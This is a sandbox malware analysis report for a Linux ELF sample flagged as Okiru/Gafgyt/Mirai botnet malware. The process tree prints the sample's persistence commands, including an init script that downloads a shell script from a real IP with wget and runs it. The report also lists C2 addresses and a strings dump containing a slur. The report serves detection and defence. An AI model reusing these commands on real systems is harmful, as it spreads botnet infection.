Edit tour

Linux Analysis Report
x86_64.nn.elf

Overview

General Information

Sample name:	x86_64.nn.elf
Analysis ID:	1581272
MD5:	279351defe09a28e3c35194c0e594f37
SHA1:	b8aa1c1fb5def2c6fcc409af7e53a3f853c6a361
SHA256:	01c4719adf5639b43828a97fe4716353204b02c3d146e8a024f978dc5950b40a
Tags:	elfuser-abuse_ch
Infos:

Detection

Okiru

Score:	96
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Okiru

Drops files in suspicious directories

Machine Learning detection for sample

Sample deletes itself

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Writes shell script file to disk with an unusual file extension

Yara signature match

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581272
Start date and time:	2024-12-27 09:22:30 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	x86_64.nn.elf
Detection:	MAL
Classification:	mal96.spre.troj.evad.linELF@0/9@2/0

Warnings

VT rate limit hit for: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Runtime Messages

Command:	/tmp/x86_64.nn.elf
PID:	5537
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

dash New Fork (PID: 5509, Parent: 3670)

rm (PID: 5509, Parent: 3670, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.39ZHOVXeyH /tmp/tmp.10MVApFg4v /tmp/tmp.xfkh797qb6

dash New Fork (PID: 5510, Parent: 3670)

rm (PID: 5510, Parent: 3670, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.39ZHOVXeyH /tmp/tmp.10MVApFg4v /tmp/tmp.xfkh797qb6

x86_64.nn.elf (PID: 5537, Parent: 5441, MD5: 279351defe09a28e3c35194c0e594f37) Arguments: /tmp/x86_64.nn.elf

x86_64.nn.elf New Fork (PID: 5546, Parent: 5537)

sh (PID: 5546, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 5557, Parent: 5546)

systemctl (PID: 5557, Parent: 5546, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

x86_64.nn.elf New Fork (PID: 5574, Parent: 5537)

sh (PID: 5574, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 5575, Parent: 5574)

chmod (PID: 5575, Parent: 5574, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

x86_64.nn.elf New Fork (PID: 5576, Parent: 5537)

sh (PID: 5576, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 5577, Parent: 5576)

ln (PID: 5577, Parent: 5576, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

x86_64.nn.elf New Fork (PID: 5578, Parent: 5537)

sh (PID: 5578, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"

x86_64.nn.elf New Fork (PID: 5579, Parent: 5537)

sh (PID: 5579, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"

sh New Fork (PID: 5580, Parent: 5579)

chmod (PID: 5580, Parent: 5579, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh

x86_64.nn.elf New Fork (PID: 5581, Parent: 5537)

sh (PID: 5581, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 5582, Parent: 5581)

mkdir (PID: 5582, Parent: 5581, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

x86_64.nn.elf New Fork (PID: 5583, Parent: 5537)

sh (PID: 5583, Parent: 5537, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"

sh New Fork (PID: 5584, Parent: 5583)

ln (PID: 5584, Parent: 5583, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh /etc/rc.d/S99sh

x86_64.nn.elf New Fork (PID: 5585, Parent: 5537)

x86_64.nn.elf New Fork (PID: 5587, Parent: 5585)

x86_64.nn.elf New Fork (PID: 5588, Parent: 5585)

udisksd New Fork (PID: 5547, Parent: 803)

dumpe2fs (PID: 5547, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 5572, Parent: 5571)

snapd-env-generator (PID: 5572, Parent: 5571, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 5597, Parent: 803)

dumpe2fs (PID: 5597, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 5630, Parent: 803)

dumpe2fs (PID: 5630, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 5672, Parent: 803)

dumpe2fs (PID: 5672, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
x86_64.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
x86_64.nn.elf	Linux_Trojan_Gafgyt_9e9530a7	unknown	unknown	0xce08:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
x86_64.nn.elf	Linux_Trojan_Gafgyt_807911a2	unknown	unknown	0xd5f7:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
x86_64.nn.elf	Linux_Trojan_Gafgyt_d4227dbf	unknown	unknown	0x9eae:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 0xa16c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
x86_64.nn.elf	Linux_Trojan_Gafgyt_d996d335	unknown	unknown	0x101ae:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
x86_64.nn.elf	Linux_Trojan_Gafgyt_620087b9	unknown	unknown	0xd1b7:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
x86_64.nn.elf	Linux_Trojan_Gafgyt_33b4111a	unknown	unknown	0xd482:$a: C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48
x86_64.nn.elf	Linux_Trojan_Mirai_e0cf29e2	unknown	unknown	0x5dd2:$a: 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
5537.1.0000000000400000.0000000000413000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
5537.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_9e9530a7	unknown	unknown	0xce08:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
5537.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_807911a2	unknown	unknown	0xd5f7:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
5537.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_d4227dbf	unknown	unknown	0x9eae:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 0xa16c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
5537.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_d996d335	unknown	unknown	0x101ae:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
5537.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_620087b9	unknown	unknown	0xd1b7:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
5537.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Gafgyt_33b4111a	unknown	unknown	0xd482:$a: C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48
5537.1.0000000000400000.0000000000413000.r-x.sdmp	Linux_Trojan_Mirai_e0cf29e2	unknown	unknown	0x5dd2:$a: 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C2 83 FE 01
Process Memory Space: x86_64.nn.elf PID: 5537	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Click to see the 4 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: x86_64.nn.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: x86_64.nn.elf	ReversingLabs: Detection: 26%
Source: x86_64.nn.elf	Virustotal: Detection: 30%			Perma Link

Machine Learning detection for sample

Source: x86_64.nn.elf

Joe Sandbox ML: detected

Source: x86_64.nn.elf

String: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginnfstftpmallocwaitpidw/etc/motd%s

Source: global traffic

TCP traffic: 192.168.2.15:38198 -> 94.156.227.234:38242

Source: /tmp/x86_64.nn.elf (PID: 5537)

Socket: 0.0.0.0:38242

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234

Source: global traffic

DNS traffic detected: DNS query: daisy.ubuntu.com

Source: x86_64.nn.elf	String found in binary or memory: http://94.156.227.229/
Source: x86_64.nn.elf, 5537.1.00007fff2783b000.00007fff2785c000.rw-.sdmp, system.16.dr, inittab.16.dr, sh.34.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr	String found in binary or memory: http://94.156.227.229/lol.sh
Source: x86_64.nn.elf	String found in binary or memory: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

System Summary

Malicious sample detected (through community Yara rule)

Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/

Source: ELF static info symbol of initial sample

.symtab present: no

Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16

Source: classification engine

Classification label: mal96.spre.troj.evad.linELF@0/9@2/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/x86_64.nn.elf (PID: 5537)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/x86_64.nn.elf (PID: 5537)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 5577)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 5584)	File: /etc/rc.d/S99sh -> /etc/init.d/sh	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/x86_64.nn.elf (PID: 5537)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5575)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5580)	File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5360/cmdline	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5640/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5641/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5642/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5719/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5632/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5731/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5633/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5710/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5732/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5634/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5733/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5635/status	Jump to behavior
